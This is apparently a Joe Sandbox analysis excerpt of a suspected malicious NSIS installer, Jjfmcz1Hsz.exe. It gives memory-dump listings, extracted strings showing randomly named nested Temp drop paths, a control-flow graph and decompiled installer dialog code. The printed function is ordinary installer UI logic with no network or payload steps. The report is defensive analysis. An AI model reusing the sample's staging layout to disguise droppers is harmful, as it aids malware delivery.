                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                                                                            • String ID: "$"C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed$C:\Users\user\Desktop$C:\Users\user\Desktop\Jjfmcz1Hsz.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                            • API String ID: 3329125770-126398704
                                                                                                                                                                            • Opcode ID: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
                                                                                                                                                                            • Instruction ID: e7c85c4fe1f62676e3f8a08d8ca43f8bf3783ba147aef7bb7f1979754dcbcc24
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
                                                                                                                                                                            • Instruction Fuzzy Hash: B7C1E5706083417AE711AF71AD8DA2B7EA8EB85306F04457FF541B61D2C77C5A05CB2E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 128 40488f-4048db GetDlgItem * 2 129 4048e1-404975 GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->129 130 404afb-404b02 128->130 131 404984-40498b DeleteObject 129->131 132 404977-404982 SendMessageA 129->132 133 404b04-404b14 130->133 134 404b16 130->134 136 40498d-404995 131->136 132->131 135 404b19-404b22 133->135 134->135 137 404b24-404b27 135->137 138 404b2d-404b33 135->138 139 404997-40499a 136->139 140 4049be-4049c2 136->140 137->138 142 404c11-404c18 137->142 145 404b42-404b49 138->145 146 404b35-404b3c 138->146 143 40499c 139->143 144 40499f-4049bc call 405d1b SendMessageA * 2 139->144 140->136 141 4049c4-4049f0 call 403ede * 2 140->141 184 4049f6-4049fc 141->184 185 404aba-404acd GetWindowLongA SetWindowLongA 141->185 150 404c89-404c91 142->150 151 404c1a-404c20 142->151 143->144 144->140 147 404b4b-404b4e 145->147 148 404bbe-404bc1 145->148 146->142 146->145 156 404b50-404b57 147->156 157 404b59-404b6e call 4047dd 147->157 148->142 161 404bc3-404bcd 148->161 153 404c93-404c99 SendMessageA 150->153 154 404c9b-404ca2 150->154 159 404e71-404e83 call 403f45 151->159 160 404c26-404c30 151->160 153->154 164 404ca4-404cab 154->164 165 404cd6-404cdd 154->165 156->148 156->157 157->148 183 404b70-404b81 157->183 160->159 168 404c36-404c45 SendMessageA 160->168 162 404bdd-404be7 161->162 163 404bcf-404bdb SendMessageA 161->163 162->142 171 404be9-404bf3 162->171 163->162 172 404cb4-404cbb 164->172 173 404cad-404cae ImageList_Destroy 164->173 176 404e33-404e3a 165->176 177 404ce3-404cef call 4011ef 165->177 168->159 178 404c4b-404c5c SendMessageA 168->178 179 404c04-404c0e 171->179 180 404bf5-404c02 171->180 181 404cc4-404cd0 172->181 182 404cbd-404cbe GlobalFree 172->182 173->172 176->159 189 404e3c-404e43 176->189 202 404cf1-404cf4 177->202 203 404cff-404d02 177->203 187 404c66-404c68 178->187 188 404c5e-404c64 178->188 179->142 180->142 181->165 182->181 183->148 191 404b83-404b85 183->191 192 4049ff-404a05 184->192 190 404ad3-404ad7 185->190 194 404c69-404c82 call 401299 SendMessageA 187->194 188->187 188->194 189->159 195 404e45-404e6f ShowWindow GetDlgItem ShowWindow 189->195 196 404af1-404af9 call 403f13 190->196 197 404ad9-404aec ShowWindow call 403f13 190->197 198 404b87-404b8e 191->198 199 404b98 191->199 200 404a9b-404aae 192->200 201 404a0b-404a33 192->201 194->150 195->159 196->130 197->159 209 404b90-404b92 198->209 210 404b94-404b96 198->210 213 404b9b-404bb7 call 40117d 199->213 200->192 217 404ab4-404ab8 200->217 211 404a35-404a6b SendMessageA 201->211 212 404a6d-404a6f 201->212 214 404cf6 202->214 215 404cf7-404cfa call 40485d 202->215 205 404d43-404d67 call 4011ef 203->205 206 404d04-404d1d call 4012e2 call 401299 203->206 230 404e09-404e1d InvalidateRect 205->230 231 404d6d 205->231 236 404d2d-404d3c SendMessageA 206->236 237 404d1f-404d25 206->237 209->213 210->213 211->200 218 404a71-404a80 SendMessageA 212->218 219 404a82-404a98 SendMessageA 212->219 213->148 214->215 215->203 217->185 217->190 218->200 219->200 230->176 233 404e1f-404e2e call 4047b0 call 404798 230->233 234 404d70-404d7b 231->234 233->176 238 404df1-404e03 234->238 239 404d7d-404d8c 234->239 236->205 240 404d27 237->240 241 404d28-404d2b 237->241 238->230 238->234 243 404d8e-404d9b 239->243 244 404d9f-404da2 239->244 240->241 241->236 241->237 243->244 245 404da4-404da7 244->245 246 404da9-404db2 244->246 248 404db7-404def SendMessageA * 2 245->248 246->248 249 404db4 246->249 248->238 249->248
                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E0040488F(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                            				struct HWND__* _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				signed char* _v28;
                                                                                                                                                                            				long _v32;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				int _v44;
                                                                                                                                                                            				signed int* _v56;
                                                                                                                                                                            				signed char* _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				long _v68;
                                                                                                                                                                            				void* _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				void* _v84;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t192;
                                                                                                                                                                            				intOrPtr _t195;
                                                                                                                                                                            				intOrPtr _t197;
                                                                                                                                                                            				long _t201;
                                                                                                                                                                            				signed int _t205;
                                                                                                                                                                            				signed int _t216;
                                                                                                                                                                            				void* _t219;
                                                                                                                                                                            				void* _t220;
                                                                                                                                                                            				int _t226;
                                                                                                                                                                            				signed int _t231;
                                                                                                                                                                            				signed int _t232;
                                                                                                                                                                            				signed int _t233;
                                                                                                                                                                            				signed int _t239;
                                                                                                                                                                            				signed int _t241;
                                                                                                                                                                            				signed char _t242;
                                                                                                                                                                            				signed char _t248;
                                                                                                                                                                            				void* _t252;
                                                                                                                                                                            				void* _t254;
                                                                                                                                                                            				signed char* _t270;
                                                                                                                                                                            				signed char _t271;
                                                                                                                                                                            				long _t273;
                                                                                                                                                                            				long _t276;
                                                                                                                                                                            				int _t279;
                                                                                                                                                                            				int _t282;
                                                                                                                                                                            				signed int _t283;
                                                                                                                                                                            				long _t284;
                                                                                                                                                                            				signed int _t287;
                                                                                                                                                                            				signed int _t294;
                                                                                                                                                                            				signed char* _t302;
                                                                                                                                                                            				struct HWND__* _t306;
                                                                                                                                                                            				int _t307;
                                                                                                                                                                            				signed int* _t308;
                                                                                                                                                                            				int _t309;
                                                                                                                                                                            				long _t310;
                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                            				void* _t313;
                                                                                                                                                                            				long _t314;
                                                                                                                                                                            				int _t315;
                                                                                                                                                                            				signed int _t316;
                                                                                                                                                                            				void* _t318;
                                                                                                                                                                            
                                                                                                                                                                            				_t306 = _a4;
                                                                                                                                                                            				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                                                                                                                            				_v8 = GetDlgItem(_t306, 0x408);
                                                                                                                                                                            				_t318 = SendMessageA;
                                                                                                                                                                            				_v20 =  *0x423728;
                                                                                                                                                                            				_t282 = 0;
                                                                                                                                                                            				_v24 =  *0x423710 + 0x94;
                                                                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                                                                            					L23:
                                                                                                                                                                            					if(_a8 != 0x405) {
                                                                                                                                                                            						_t285 = _a16;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_a12 = _t282;
                                                                                                                                                                            						_t285 = 1;
                                                                                                                                                                            						_a8 = 0x40f;
                                                                                                                                                                            						_a16 = 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                                                                            						_v16 = _t285;
                                                                                                                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                                                                                                                            							if(( *0x423719 & 0x00000002) != 0) {
                                                                                                                                                                            								L41:
                                                                                                                                                                            								if(_v16 != _t282) {
                                                                                                                                                                            									_t231 = _v16;
                                                                                                                                                                            									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                                                                                                                                                                            										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
                                                                                                                                                                            									}
                                                                                                                                                                            									_t232 = _v16;
                                                                                                                                                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                                                                                                                                                                            										_t285 = _v20;
                                                                                                                                                                            										_t233 =  *(_t232 + 0x5c);
                                                                                                                                                                            										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                                                                                                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L48;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_a8 == 0x413) {
                                                                                                                                                                            								L33:
                                                                                                                                                                            								_t285 = 0 | _a8 != 0x00000413;
                                                                                                                                                                            								_t239 = E004047DD(_v8, _a8 != 0x413);
                                                                                                                                                                            								_t311 = _t239;
                                                                                                                                                                            								if(_t311 >= _t282) {
                                                                                                                                                                            									_t88 = _v20 + 8; // 0x8
                                                                                                                                                                            									_t285 = _t239 * 0x418 + _t88;
                                                                                                                                                                            									_t241 =  *_t285;
                                                                                                                                                                            									if((_t241 & 0x00000010) == 0) {
                                                                                                                                                                            										if((_t241 & 0x00000040) == 0) {
                                                                                                                                                                            											_t242 = _t241 ^ 0x00000001;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t248 = _t241 ^ 0x00000080;
                                                                                                                                                                            											if(_t248 >= 0) {
                                                                                                                                                                            												_t242 = _t248 & 0x000000fe;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t242 = _t248 | 0x00000001;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            										 *_t285 = _t242;
                                                                                                                                                                            										E0040117D(_t311);
                                                                                                                                                                            										_a12 = _t311 + 1;
                                                                                                                                                                            										_a16 =  !( *0x423718) >> 0x00000008 & 0x00000001;
                                                                                                                                                                            										_a8 = 0x40f;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L41;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t285 = _a16;
                                                                                                                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                                                                            								goto L41;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L48;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						L48:
                                                                                                                                                                            						if(_a8 != 0x111) {
                                                                                                                                                                            							L56:
                                                                                                                                                                            							if(_a8 == 0x200) {
                                                                                                                                                                            								SendMessageA(_v8, 0x200, _t282, _t282);
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_a8 == 0x40b) {
                                                                                                                                                                            								_t219 =  *0x41fcec;
                                                                                                                                                                            								if(_t219 != _t282) {
                                                                                                                                                                            									ImageList_Destroy(_t219);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t220 =  *0x41fd00;
                                                                                                                                                                            								if(_t220 != _t282) {
                                                                                                                                                                            									GlobalFree(_t220);
                                                                                                                                                                            								}
                                                                                                                                                                            								 *0x41fcec = _t282;
                                                                                                                                                                            								 *0x41fd00 = _t282;
                                                                                                                                                                            								 *0x423760 = _t282;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_a8 != 0x40f) {
                                                                                                                                                                            								L88:
                                                                                                                                                                            								if(_a8 == 0x420 && ( *0x423719 & 0x00000001) != 0) {
                                                                                                                                                                            									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                                                                            									ShowWindow(_v8, _t307);
                                                                                                                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L91;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								E004011EF(_t285, _t282, _t282);
                                                                                                                                                                            								_t192 = _a12;
                                                                                                                                                                            								if(_t192 != _t282) {
                                                                                                                                                                            									if(_t192 != 0xffffffff) {
                                                                                                                                                                            										_t192 = _t192 - 1;
                                                                                                                                                                            									}
                                                                                                                                                                            									_push(_t192);
                                                                                                                                                                            									_push(8);
                                                                                                                                                                            									E0040485D();
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_a16 == _t282) {
                                                                                                                                                                            									L75:
                                                                                                                                                                            									E004011EF(_t285, _t282, _t282);
                                                                                                                                                                            									_v32 =  *0x41fd00;
                                                                                                                                                                            									_t195 =  *0x423728;
                                                                                                                                                                            									_v60 = 0xf030;
                                                                                                                                                                            									_v20 = _t282;
                                                                                                                                                                            									if( *0x42372c <= _t282) {
                                                                                                                                                                            										L86:
                                                                                                                                                                            										InvalidateRect(_v8, _t282, 1);
                                                                                                                                                                            										_t197 =  *0x422edc; // 0x70e974
                                                                                                                                                                            										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                                                                                                                                            											E00404798(0x3ff, 0xfffffffb, E004047B0(5));
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L88;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t308 = _t195 + 8;
                                                                                                                                                                            									do {
                                                                                                                                                                            										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                                                                                                                            										if(_t201 != _t282) {
                                                                                                                                                                            											_t287 =  *_t308;
                                                                                                                                                                            											_v68 = _t201;
                                                                                                                                                                            											_v72 = 8;
                                                                                                                                                                            											if((_t287 & 0x00000001) != 0) {
                                                                                                                                                                            												_v72 = 9;
                                                                                                                                                                            												_v56 =  &(_t308[4]);
                                                                                                                                                                            												_t308[0] = _t308[0] & 0x000000fe;
                                                                                                                                                                            											}
                                                                                                                                                                            											if((_t287 & 0x00000040) == 0) {
                                                                                                                                                                            												_t205 = (_t287 & 0x00000001) + 1;
                                                                                                                                                                            												if((_t287 & 0x00000010) != 0) {
                                                                                                                                                                            													_t205 = _t205 + 3;
                                                                                                                                                                            												}
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t205 = 3;
                                                                                                                                                                            											}
                                                                                                                                                                            											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                                                                                                                            											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                                                                                            											SendMessageA(_v8, 0x110d, _t282,  &_v72);
                                                                                                                                                                            										}
                                                                                                                                                                            										_v20 = _v20 + 1;
                                                                                                                                                                            										_t308 =  &(_t308[0x106]);
                                                                                                                                                                            									} while (_v20 <  *0x42372c);
                                                                                                                                                                            									goto L86;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t309 = E004012E2( *0x41fd00);
                                                                                                                                                                            									E00401299(_t309);
                                                                                                                                                                            									_t216 = 0;
                                                                                                                                                                            									_t285 = 0;
                                                                                                                                                                            									if(_t309 <= _t282) {
                                                                                                                                                                            										L74:
                                                                                                                                                                            										SendMessageA(_v12, 0x14e, _t285, _t282);
                                                                                                                                                                            										_a16 = _t309;
                                                                                                                                                                            										_a8 = 0x420;
                                                                                                                                                                            										goto L75;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										goto L71;
                                                                                                                                                                            									}
                                                                                                                                                                            									do {
                                                                                                                                                                            										L71:
                                                                                                                                                                            										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                                                                                                                            											_t285 = _t285 + 1;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t216 = _t216 + 1;
                                                                                                                                                                            									} while (_t216 < _t309);
                                                                                                                                                                            									goto L74;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                                                                            							goto L91;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                                                                                                                                                                            							if(_t226 == 0xffffffff) {
                                                                                                                                                                            								goto L91;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                                                                                                                                                                            							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                                                                                                                            								_t310 = 0x20;
                                                                                                                                                                            							}
                                                                                                                                                                            							E00401299(_t310);
                                                                                                                                                                            							SendMessageA(_a4, 0x420, _t282, _t310);
                                                                                                                                                                            							_a12 = _a12 | 0xffffffff;
                                                                                                                                                                            							_a16 = _t282;
                                                                                                                                                                            							_a8 = 0x40f;
                                                                                                                                                                            							goto L56;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                            					_v16 = 2;
                                                                                                                                                                            					 *0x423760 = _t306;
                                                                                                                                                                            					 *0x41fd00 = GlobalAlloc(0x40,  *0x42372c << 2);
                                                                                                                                                                            					_t252 = LoadBitmapA( *0x423700, 0x6e);
                                                                                                                                                                            					 *0x41fcf4 =  *0x41fcf4 | 0xffffffff;
                                                                                                                                                                            					_t313 = _t252;
                                                                                                                                                                            					 *0x41fcfc = SetWindowLongA(_v8, 0xfffffffc, E00404E86);
                                                                                                                                                                            					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                                                                            					 *0x41fcec = _t254;
                                                                                                                                                                            					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                                                                                                                            					SendMessageA(_v8, 0x1109, 2,  *0x41fcec);
                                                                                                                                                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                                                                            						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                                                                                            					}
                                                                                                                                                                            					DeleteObject(_t313);
                                                                                                                                                                            					_t314 = 0;
                                                                                                                                                                            					do {
                                                                                                                                                                            						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                                                                                                                            						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                                                                                                                            							if(_t314 != 0x20) {
                                                                                                                                                                            								_v16 = _t282;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t279 = SendMessageA(_v12, 0x143, _t282, E00405D1B(_t282, _t314, _t318, _t282, _t260)); // executed
                                                                                                                                                                            							SendMessageA(_v12, 0x151, _t279, _t314);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t314 = _t314 + 1;
                                                                                                                                                                            					} while (_t314 < 0x21);
                                                                                                                                                                            					_t315 = _a16;
                                                                                                                                                                            					_t283 = _v16;
                                                                                                                                                                            					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                                                                                                                            					_push(0x15);
                                                                                                                                                                            					E00403EDE(_a4);
                                                                                                                                                                            					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                                                                                                                            					_push(0x16);
                                                                                                                                                                            					E00403EDE(_a4);
                                                                                                                                                                            					_t316 = 0;
                                                                                                                                                                            					_t284 = 0;
                                                                                                                                                                            					if( *0x42372c <= 0) {
                                                                                                                                                                            						L19:
                                                                                                                                                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                                                            						goto L20;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t302 = _v20 + 8;
                                                                                                                                                                            						_v28 = _t302;
                                                                                                                                                                            						do {
                                                                                                                                                                            							_t270 =  &(_t302[0x10]);
                                                                                                                                                                            							if( *_t270 != 0) {
                                                                                                                                                                            								_v60 = _t270;
                                                                                                                                                                            								_t271 =  *_t302;
                                                                                                                                                                            								_t294 = 0x20;
                                                                                                                                                                            								_v84 = _t284;
                                                                                                                                                                            								_v80 = 0xffff0002;
                                                                                                                                                                            								_v76 = 0xd;
                                                                                                                                                                            								_v64 = _t294;
                                                                                                                                                                            								_v40 = _t316;
                                                                                                                                                                            								_v68 = _t271 & _t294;
                                                                                                                                                                            								if((_t271 & 0x00000002) == 0) {
                                                                                                                                                                            									if((_t271 & 0x00000004) == 0) {
                                                                                                                                                                            										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
                                                                                                                                                                            										 *( *0x41fd00 + _t316 * 4) = _t273;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_v76 = 0x4d;
                                                                                                                                                                            									_v44 = 1;
                                                                                                                                                                            									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                                                                                            									_v32 = 1;
                                                                                                                                                                            									 *( *0x41fd00 + _t316 * 4) = _t276;
                                                                                                                                                                            									_t284 =  *( *0x41fd00 + _t316 * 4);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t316 = _t316 + 1;
                                                                                                                                                                            							_t302 =  &(_v28[0x418]);
                                                                                                                                                                            							_v28 = _t302;
                                                                                                                                                                            						} while (_t316 <  *0x42372c);
                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                            							L20:
                                                                                                                                                                            							if(_v16 != 0) {
                                                                                                                                                                            								E00403F13(_v8);
                                                                                                                                                                            								_t282 = 0;
                                                                                                                                                                            								goto L23;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								ShowWindow(_v12, 5);
                                                                                                                                                                            								E00403F13(_v12);
                                                                                                                                                                            								L91:
                                                                                                                                                                            								return E00403F45(_a8, _a12, _a16);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L19;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}































































                                                                                                                                                                            0x0040489e
                                                                                                                                                                            0x004048af
                                                                                                                                                                            0x004048b4
                                                                                                                                                                            0x004048bc
                                                                                                                                                                            0x004048c2
                                                                                                                                                                            0x004048ca
                                                                                                                                                                            0x004048d8
                                                                                                                                                                            0x004048db
                                                                                                                                                                            0x00404afb
                                                                                                                                                                            0x00404b02
                                                                                                                                                                            0x00404b16
                                                                                                                                                                            0x00404b04
                                                                                                                                                                            0x00404b06
                                                                                                                                                                            0x00404b09
                                                                                                                                                                            0x00404b0a
                                                                                                                                                                            0x00404b11
                                                                                                                                                                            0x00404b11
                                                                                                                                                                            0x00404b22
                                                                                                                                                                            0x00404b30
                                                                                                                                                                            0x00404b33
                                                                                                                                                                            0x00404b49
                                                                                                                                                                            0x00404bbe
                                                                                                                                                                            0x00404bc1
                                                                                                                                                                            0x00404bc3
                                                                                                                                                                            0x00404bcd
                                                                                                                                                                            0x00404bdb
                                                                                                                                                                            0x00404bdb
                                                                                                                                                                            0x00404bdd
                                                                                                                                                                            0x00404be7
                                                                                                                                                                            0x00404bed
                                                                                                                                                                            0x00404bf0
                                                                                                                                                                            0x00404bf3
                                                                                                                                                                            0x00404c0e
                                                                                                                                                                            0x00404bf5
                                                                                                                                                                            0x00404bff
                                                                                                                                                                            0x00404bff
                                                                                                                                                                            0x00404bf3
                                                                                                                                                                            0x00404be7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404bc1
                                                                                                                                                                            0x00404b4e
                                                                                                                                                                            0x00404b59
                                                                                                                                                                            0x00404b5e
                                                                                                                                                                            0x00404b65
                                                                                                                                                                            0x00404b6a
                                                                                                                                                                            0x00404b6e
                                                                                                                                                                            0x00404b79
                                                                                                                                                                            0x00404b79
                                                                                                                                                                            0x00404b7d
                                                                                                                                                                            0x00404b81
                                                                                                                                                                            0x00404b85
                                                                                                                                                                            0x00404b98
                                                                                                                                                                            0x00404b87
                                                                                                                                                                            0x00404b87
                                                                                                                                                                            0x00404b8e
                                                                                                                                                                            0x00404b94
                                                                                                                                                                            0x00404b90
                                                                                                                                                                            0x00404b90
                                                                                                                                                                            0x00404b90
                                                                                                                                                                            0x00404b8e
                                                                                                                                                                            0x00404b9c
                                                                                                                                                                            0x00404b9e
                                                                                                                                                                            0x00404bb1
                                                                                                                                                                            0x00404bb4
                                                                                                                                                                            0x00404bb7
                                                                                                                                                                            0x00404bb7
                                                                                                                                                                            0x00404b81
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404b6e
                                                                                                                                                                            0x00404b50
                                                                                                                                                                            0x00404b57
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404c11
                                                                                                                                                                            0x00404c11
                                                                                                                                                                            0x00404c18
                                                                                                                                                                            0x00404c89
                                                                                                                                                                            0x00404c91
                                                                                                                                                                            0x00404c99
                                                                                                                                                                            0x00404c99
                                                                                                                                                                            0x00404ca2
                                                                                                                                                                            0x00404ca4
                                                                                                                                                                            0x00404cab
                                                                                                                                                                            0x00404cae
                                                                                                                                                                            0x00404cae
                                                                                                                                                                            0x00404cb4
                                                                                                                                                                            0x00404cbb
                                                                                                                                                                            0x00404cbe
                                                                                                                                                                            0x00404cbe
                                                                                                                                                                            0x00404cc4
                                                                                                                                                                            0x00404cca
                                                                                                                                                                            0x00404cd0
                                                                                                                                                                            0x00404cd0
                                                                                                                                                                            0x00404cdd
                                                                                                                                                                            0x00404e33
                                                                                                                                                                            0x00404e3a
                                                                                                                                                                            0x00404e57
                                                                                                                                                                            0x00404e5d
                                                                                                                                                                            0x00404e6f
                                                                                                                                                                            0x00404e6f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404ce3
                                                                                                                                                                            0x00404ce5
                                                                                                                                                                            0x00404cea
                                                                                                                                                                            0x00404cef
                                                                                                                                                                            0x00404cf4
                                                                                                                                                                            0x00404cf6
                                                                                                                                                                            0x00404cf6
                                                                                                                                                                            0x00404cf7
                                                                                                                                                                            0x00404cf8
                                                                                                                                                                            0x00404cfa
                                                                                                                                                                            0x00404cfa
                                                                                                                                                                            0x00404d02
                                                                                                                                                                            0x00404d43
                                                                                                                                                                            0x00404d45
                                                                                                                                                                            0x00404d55
                                                                                                                                                                            0x00404d58
                                                                                                                                                                            0x00404d5d
                                                                                                                                                                            0x00404d64
                                                                                                                                                                            0x00404d67
                                                                                                                                                                            0x00404e09
                                                                                                                                                                            0x00404e0f
                                                                                                                                                                            0x00404e15
                                                                                                                                                                            0x00404e1d
                                                                                                                                                                            0x00404e2e
                                                                                                                                                                            0x00404e2e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404e1d
                                                                                                                                                                            0x00404d6d
                                                                                                                                                                            0x00404d70
                                                                                                                                                                            0x00404d76
                                                                                                                                                                            0x00404d7b
                                                                                                                                                                            0x00404d7d
                                                                                                                                                                            0x00404d7f
                                                                                                                                                                            0x00404d85
                                                                                                                                                                            0x00404d8c
                                                                                                                                                                            0x00404d91
                                                                                                                                                                            0x00404d98
                                                                                                                                                                            0x00404d9b
                                                                                                                                                                            0x00404d9b
                                                                                                                                                                            0x00404da2
                                                                                                                                                                            0x00404dae
                                                                                                                                                                            0x00404db2
                                                                                                                                                                            0x00404db4
                                                                                                                                                                            0x00404db4
                                                                                                                                                                            0x00404da4
                                                                                                                                                                            0x00404da6
                                                                                                                                                                            0x00404da6
